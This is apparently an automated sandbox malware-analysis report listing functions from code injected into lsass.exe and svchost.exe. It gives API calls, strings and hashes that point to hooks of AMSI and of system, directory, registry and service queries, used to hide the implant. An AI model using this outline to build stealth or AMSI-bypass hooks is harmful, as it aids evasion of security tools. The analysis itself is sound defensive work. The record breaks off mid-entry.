Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 34111632218F8482EB218B25F444699B7F5FB88B94F584620EB8D07B69DF78C592CB40

Function 0000017D2DD89178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000017D2DD891C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,0000017D2DD887F7), ref: 0000017D2DD89209

Strings

csm, xrefs: 0000017D2DD891F6

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 1cc6089273064e111180bd74b2486519d09c46a90e5625fb4184db58a00ffaf3
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 6E110732218B8482EB618F15F444299B7F5FB88B94F6C4621EACD47B65DF39C592CB00

Function 0000017D2DD51D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017D2DD51D69
HeapAlloc.KERNEL32 ref: 0000017D2DD51D77
GetProcessHeap.KERNEL32 ref: 0000017D2DD51D9C
HeapFree.KERNEL32 ref: 0000017D2DD51DAA

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 721abd91f3690e52f6e2d03652fbd8b305912301ab44bd746d91c8c08f8d5257
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: CC115B21A15F8886EA14CB66B80429977B0FB88FD0F5C4125DF4E53766EF78D4828380

Function 0000017D2DD81D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017D2DD81D69
HeapAlloc.KERNEL32 ref: 0000017D2DD81D77
GetProcessHeap.KERNEL32 ref: 0000017D2DD81D9C
HeapFree.KERNEL32 ref: 0000017D2DD81DAA

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 4da8378083cf3f74fbf4b6e13f4fd663bc3e5d3b278b433972dcbe017ac43df3
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 7B115B21A09F8885EA15CF66B80429977B0FB88FD0F6D4125DE4E93766EF39D4838300

Function 0000017D2DD51264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017D2DD5126A
HeapAlloc.KERNEL32 ref: 0000017D2DD51279
GetProcessHeap.KERNEL32 ref: 0000017D2DD51293
HeapAlloc.KERNEL32 ref: 0000017D2DD512A4

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 8be371d4c702924ae43c8205af8ae46fcb34ac841cdc9e9091f12d0e275119f0
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 71E03931602A089AE7148B62F80838936F1EB88B05F488024CA0907351EF7D84DA87C0

Function 0000017D2DD81264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017D2DD8126A
HeapAlloc.KERNEL32 ref: 0000017D2DD81279
GetProcessHeap.KERNEL32 ref: 0000017D2DD81293
HeapAlloc.KERNEL32 ref: 0000017D2DD812A4

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 84452d5df85e26a687d517e9152bb4517ea1800da2cefb1fbab3fd001e8bdf5a
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 53E06D31605B089AE7148F62E8083C936F1FF88F05F48C024CA0D07361EF7E84DA8740

Function 0000017D2DD51000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017D2DD51006
HeapAlloc.KERNEL32 ref: 0000017D2DD51015
GetProcessHeap.KERNEL32 ref: 0000017D2DD51028
HeapAlloc.KERNEL32 ref: 0000017D2DD51037

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: a3c236485addc4aadda2de53174d0080134f033a9d576b6ac258d18ee10dc9bc
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 77E0ED71611A089BE7189B62F80429976B1FF88B15F488064CA0907311EE3C84DA9690

Function 0000017D2DD81000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017D2DD81006
HeapAlloc.KERNEL32 ref: 0000017D2DD81015
GetProcessHeap.KERNEL32 ref: 0000017D2DD81028
HeapAlloc.KERNEL32 ref: 0000017D2DD81037

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 448b2953cca01322ab99f4bea14cfa22d25d4f8b2947c58beb2b9094a6ce8700
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 38E0ED71615A089AE7189F62E8043D976B1FF88B15F488074CA0907321EE3984DA9610

Analysis Process: svchost.exePID: 912, Parent PID: 6140COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1393
Total number of Limit Nodes:	7

Executed Functions

Function 0000022F4B921E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000022F4B921E7F

Part of subcall function 0000022F4B9222A8: GetModuleHandleA.KERNEL32(?,?,?,0000022F4B921EB1), ref: 0000022F4B9222C0
Part of subcall function 0000022F4B9222A8: GetProcAddress.KERNEL32(?,?,?,0000022F4B921EB1), ref: 0000022F4B9222D1

CreateThread.KERNELBASE ref: 0000022F4B922043
TlsAlloc.KERNEL32 ref: 0000022F4B922049
TlsAlloc.KERNEL32 ref: 0000022F4B922055
TlsAlloc.KERNEL32 ref: 0000022F4B922061
TlsAlloc.KERNEL32 ref: 0000022F4B92206D
TlsAlloc.KERNEL32 ref: 0000022F4B922079
TlsAlloc.KERNEL32 ref: 0000022F4B922085

Strings

PdhGetRawCounterArrayW, xrefs: 0000022F4B921FD0
EnumServicesStatusExW, xrefs: 0000022F4B921F71, 0000022F4B921F92
ntdll.dll, xrefs: 0000022F4B921E8D
NtQueryDirectoryFileEx, xrefs: 0000022F4B921EFC
NtDeviceIoControlFile, xrefs: 0000022F4B921FB6
NtEnumerateKey, xrefs: 0000022F4B921F19
NtResumeThread, xrefs: 0000022F4B921EC2
amsi.dll, xrefs: 0000022F4B922019
pdh.dll, xrefs: 0000022F4B921FD7, 0000022F4B921FF8
advapi32.dll, xrefs: 0000022F4B921F57, 0000022F4B921F78
sechost.dll, xrefs: 0000022F4B921F99
AmsiScanBuffer, xrefs: 0000022F4B922012
NtQuerySystemInformation, xrefs: 0000022F4B921EA5
PdhGetFormattedCounterArrayW, xrefs: 0000022F4B921FF1
NtQueryDirectoryFile, xrefs: 0000022F4B921EDF
NtEnumerateValueKey, xrefs: 0000022F4B921F36
EnumServiceGroupW, xrefs: 0000022F4B921F50

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 56b6ef7aae2003b2666995d73d3f8da4165ef61dab3b018a8c9eb3aa42e26a65
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 9351A568D14A56B5FB88FFE5EE787D73730A708345F845932960902563DEFC82AAC390

Function 0000022F4B92104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000022F4B9210B1
RegEnumValueW.ADVAPI32 ref: 0000022F4B921117
GetProcessHeap.KERNEL32 ref: 0000022F4B92115A
HeapAlloc.KERNEL32 ref: 0000022F4B921168
GetProcessHeap.KERNEL32 ref: 0000022F4B921185
HeapFree.KERNEL32 ref: 0000022F4B921193

Strings

d, xrefs: 0000022F4B9210D6

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: b847adb62990c8b4585e741d70a7157698aa1bc9e67df0a6988a8ea5b1f4b2bb
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: BB41AF36A14B80DAE7A4DFA1E55839A77B1F388B88F008135DB8907759DF7CC595CB00

Function 0000022F4B921E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000022F4B921E47
GetProcAddress.KERNEL32 ref: 0000022F4B921E57
SleepEx.KERNELBASE ref: 0000022F4B921E67

Strings

AmsiScanBuffer, xrefs: 0000022F4B921E50
amsi.dll, xrefs: 0000022F4B921E40

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 2707e0eff7b1b9e8f61abd333ff2ec4983dee57ae7fd51a1eb0f6ce0dd1bda2b
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 50D06228E11A40F5F9CD7FD1DEBD35622716B5CB01FC45835C70E01262DEAD8569C341

Function 0000022F4B921264 Relevance: 5.0, APIs: 4, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000022F4B92126A
HeapAlloc.KERNEL32 ref: 0000022F4B921279
GetProcessHeap.KERNEL32 ref: 0000022F4B921293
HeapAlloc.KERNEL32 ref: 0000022F4B9212A4

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: b3e4a5b6f9333f152bb267859d7de1761df9f28d76ce986ecf85fb72ba9be1be
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: A4E03935A01604AAE794AFA2D82834A36E1EB8CB05F44D034CA0907351EFBDC899C740

Function 0000022F4B923A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000022F4B923A35
PathFindFileNameW.SHLWAPI ref: 0000022F4B923A44

Part of subcall function 0000022F4B923F88: StrCmpNIW.KERNELBASE(?,?,?,0000022F4B92272F), ref: 0000022F4B923FA0

Part of subcall function 0000022F4B923EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923EDB
Part of subcall function 0000022F4B923EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F0E
Part of subcall function 0000022F4B923EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F2E
Part of subcall function 0000022F4B923EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F47
Part of subcall function 0000022F4B923EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F68

CreateThread.KERNELBASE ref: 0000022F4B923A8B

Part of subcall function 0000022F4B921E74: GetCurrentThread.KERNEL32 ref: 0000022F4B921E7F
Part of subcall function 0000022F4B921E74: CreateThread.KERNELBASE ref: 0000022F4B922043
Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922049
Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922055
Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922061
Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B92206D
Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922079
Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922085

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 5f1f564115a3c2f07b4922df6e2128082fd153148bbbb057b57b51238e2adea1
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 14118B29E28701BAFBE8BFE0EB2C39B23B0A758345F404835860681182DEFCC458C202

Function 0000022F4B923F88 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.KERNELBASE(?,?,?,0000022F4B92272F), ref: 0000022F4B923FA0

Strings

$nya-, xrefs: 0000022F4B923F99

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID:
String ID: $nya-
API String ID: 0-1266920357
Opcode ID: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
Instruction ID: 7c511189d8bd023de34a560d2ec103ce2a25d726894c4c52d98c75f0c23c25be
Opcode Fuzzy Hash: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
Instruction Fuzzy Hash: BBD05E29F21706ABFBA8AFE1EEE86A26370DB08B04F485032DA0001101DB988D9EC710

Function 0000022F4B8F2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 0000022F4B8F302E

Memory Dump Source

Source File: 0000000C.00000003.1538492265.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_22f4b8f0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 1a342e552356d2e1af5ce3fa28535de16e2ccce78197f29e3b350a65e4913c9f
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: A191477AF0125097EBA0AF65D608F7EB3A1F744B96F548131AF490778AEA38D853C710

Function 0000022F4B921BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000022F4B921724: GetProcessHeap.KERNEL32 ref: 0000022F4B92172F
Part of subcall function 0000022F4B921724: HeapAlloc.KERNEL32 ref: 0000022F4B92173E
Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9217AE
Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9217DB
Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B9217F5
Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921815
Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B921830
Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921850
Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B92186B
Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92188B
Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B9218A6
Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B9218C6

SleepEx.KERNELBASE ref: 0000022F4B921BDF

Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B9218E1
Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921901
Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B92191C
Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B92193C
Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B921957
Part of subcall function 0000022F4B921724: RegOpenKeyExW.ADVAPI32 ref: 0000022F4B921977
Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B921992
Part of subcall function 0000022F4B921724: RegCloseKey.ADVAPI32 ref: 0000022F4B92199C

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

